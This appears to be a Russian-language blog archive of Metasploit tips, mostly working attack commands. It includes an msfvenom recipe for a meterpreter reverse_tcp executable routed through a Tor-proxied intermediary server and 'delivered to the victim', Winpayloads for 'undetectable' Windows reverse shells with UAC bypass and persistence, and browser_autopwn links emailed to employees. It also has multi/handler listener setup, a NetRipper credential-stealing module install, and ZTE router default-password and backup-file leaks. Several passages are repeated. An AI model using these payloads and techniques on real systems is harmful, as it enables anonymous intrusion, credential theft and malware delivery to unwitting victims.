Python and Powershell internal penetration testing framework
PSMSF
create powershell shell code used in cmd console with Metasploit Framework
Показаны сообщения с ярлыком metasploit. Показать все сообщения
Показаны сообщения с ярлыком metasploit. Показать все сообщения
27.01.2016
Beef + Armitage [plugin]
git clone https://github.com/benyG/cortana-scripts
копируем папку beef_strike из cortana-scripts в /root/
копируем библиотеки из архива (зеркало) в папку /beef_strike/lib
после чего запускаем Armitage.
Подгружаем скрипт beef_strike.cna (если папка beef_strike находится не в каталоге /root/, редактируем файл beef_strike.cna, изменяем пути импорта)
копируем папку beef_strike из cortana-scripts в /root/
копируем библиотеки из архива (зеркало) в папку /beef_strike/lib
после чего запускаем Armitage.
Подгружаем скрипт beef_strike.cna (если папка beef_strike находится не в каталоге /root/, редактируем файл beef_strike.cna, изменяем пути импорта)
11.01.2016
Generate Meterpreter payloads via msfvenom [FAST] Быстрый способ создания полезной нагрузки
A quick way to generate various "basic" Meterpreter payloads via msfvenom
Install:
Designed for Kali Linux v2.x & Metasploit v4.11+.
Kali v1.x should work.
OSX 10.11+ should work.
Weakerth4n 6+ should work.
...nothing else has been tested.
curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/mpc.sh" > /usr/bin/mpc
chmod +x /usr/bin/mpc
mpc
Winpayloads - Undetectable Windows Payload Generation [необнаружимая полезная нагрузка под Windows ]
git clone https://github.com/Charliedean/Winpayloads
cd WinPayloads
sudo ./setup.sh python WinPayloads.py
[1] Windows Reverse Shell(Stageless) [Shellter]
[2] Windows Reverse Meterpreter(Staged) [Shellter, UacBypass, Priv Esc Checks, Persistence]
[3] Windows Bind Meterpreter(Staged) [Shellter, UacBypass, Priv Esc Checks, Persistence]
[4] Windows Reverse Meterpreter(Raw Shellcode) [Base64 Encode]
07.12.2015
meterpreter/reverse_tcp через промежуточный сервер с помощью SSH-туннелей
Используем левый сервер в качестве прокси, к которому будет цепляться meterpreter жертвы с помощью reverse tcp.
Запускаем handler в metasploit'e с метерпритером в качестве нагрузки и указываем адрес левого сервера:
use exploit/multi/handler
Запускаем handler в metasploit'e с метерпритером в качестве нагрузки и указываем адрес левого сервера:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST KALI_ETH0_IP
set LPORT LPORT
В настройках sshd левого сервера указываем GatewayPorts yes. Через proxychains4, настроенный на тор, сначала пробрасываем себе ssh:
proxychains4 ssh -v -N -L 42022:127.0.0.1:22 USER@LEFT_SERVER_IP
Затем пробрасываем себе порт, на который будет цепляться meterpreter:
ssh -v -N -R LPORT:KALI_ETH0_IP:LPORT user@127.0.0.1 -p 42002
Генерируем exe с meterpreter/reverse_tcp в качестве нагрузки:
msfvenom -a x86 --platform Windows -f exe -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=22222 > payload.exe
Доставляем payload.exe жертве, запускаем, радуемся.
В настройках sshd левого сервера указываем GatewayPorts yes. Через proxychains4, настроенный на тор, сначала пробрасываем себе ssh:
proxychains4 ssh -v -N -L 42022:127.0.0.1:22 USER@LEFT_SERVER_IP
Затем пробрасываем себе порт, на который будет цепляться meterpreter:
ssh -v -N -R LPORT:KALI_ETH0_IP:LPORT user@127.0.0.1 -p 42002
Генерируем exe с meterpreter/reverse_tcp в качестве нагрузки:
msfvenom -a x86 --platform Windows -f exe -p windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=22222 > payload.exe
Доставляем payload.exe жертве, запускаем, радуемся.
30.08.2015
metasploit db connect postgresql
service postgresql start
You can verify that PostgreSQL is running by checking the output of
ss -ant
and making sure that port 5432 is listening.
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 :::22 :::*
LISTEN 0 128 *:22 *:*
LISTEN 0 128 127.0.0.1:5432 *:*
LISTEN 0 128 ::1:5432 :::*
Initialise the Metasploit PostgreSQL Database
With PostgreSQL up and running, we next need to create and initialize the msf database.
You can verify that PostgreSQL is running by checking the output of
ss -ant
and making sure that port 5432 is listening.
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 :::22 :::*
LISTEN 0 128 *:22 *:*
LISTEN 0 128 127.0.0.1:5432 *:*
LISTEN 0 128 ::1:5432 :::*
Initialise the Metasploit PostgreSQL Database
With PostgreSQL up and running, we next need to create and initialize the msf database.
msfdb init
Launch msfconsole in Kali
Now that the PostgreSQL service is up and running and the database is initialized, you can launch msfconsole and verify database connectivity with the db_status command as shown below.
Launch msfconsole in Kali
Now that the PostgreSQL service is up and running and the database is initialized, you can launch msfconsole and verify database connectivity with the db_status command as shown below.
msfconsole
msf > db_status
[*] postgresql connected to msf3
msf >
msf > db_status
[*] postgresql connected to msf3
msf >
27.08.2015
metasploit other module install
cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper.rb
...and files:
- mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper
- g++ -Wall netripper.cpp -o netripper
- cp netripper /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper
- cd ../Release
- cp DLL.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.dll
26.08.2015
Multiple Vulnerabilities [from router to pc reverse shell]
Default Password Being Used (CVE-2014-4018)
In ZTE routers the username is a constant which is “admin” and the password by default is “admin”
ROM-0 Backup File Disclosure (CVE-2014-4019)
There is a rom-0 backup file contains sensitive information such as the passwords. There is a disclosure in which anyone can download that file without any authentication by a simple GET request.
http://192.168.1.1/rom-0
15.07.2015
FakeAp [Kali + Alfa]
SCRIPT:
#!/bin/bash
if [ "$1" == "stop" ];then
echo "Killing Airbase-ng..."
pkill airbase-ng
sleep 3;
#!/bin/bash
if [ "$1" == "stop" ];then
echo "Killing Airbase-ng..."
pkill airbase-ng
sleep 3;
09.05.2015
autopwn browser msf tip
browser_autopwn
In order to use this attack we have to open the metasploit framework and to use the browser_autopwn module.In the next image you can see the available options and default settings for this module.
Options of browser autopwn module
We will set up the LHOST with our IP address,the SRVPORT with the port 80 (otherwise the link that we have to send to the user must me in the format IP:8080) and the URIPATH with / in order to prevent metasploit to set up random URL’s.
Configuring the Browser Autopwn
After the execution of this module we will notice that different exploits for a variety of browsers will start loading to our web server.
Loading the browser exploits
Now we can share the link through our email to our client employees.If any user opens the malicious link,the autopwn module will try all these exploits in order to see if it can break into the client.If the browser is vulnerable to any of these exploits meterpreter sessions will open.
Meterpreter sessions opened with Browser Autopwn
Browser based attacks are not stable.This is because browsers can crash which means that the meterpreter session or the shell access will lost.For that reason the metasploit will try to migrate with a another process more stable as soon as possible.
Migrate to another process
21.04.2015
exploit / multi / handler
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
msf exploit(handler) > set LPORT 443
msf exploit(handler) > set LHOST 10.13.37.6
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Started HTTPS reverse handler on https://10.13.37.6:443/
[*] Starting the payload handler...
Подписаться на:
Сообщения (Atom)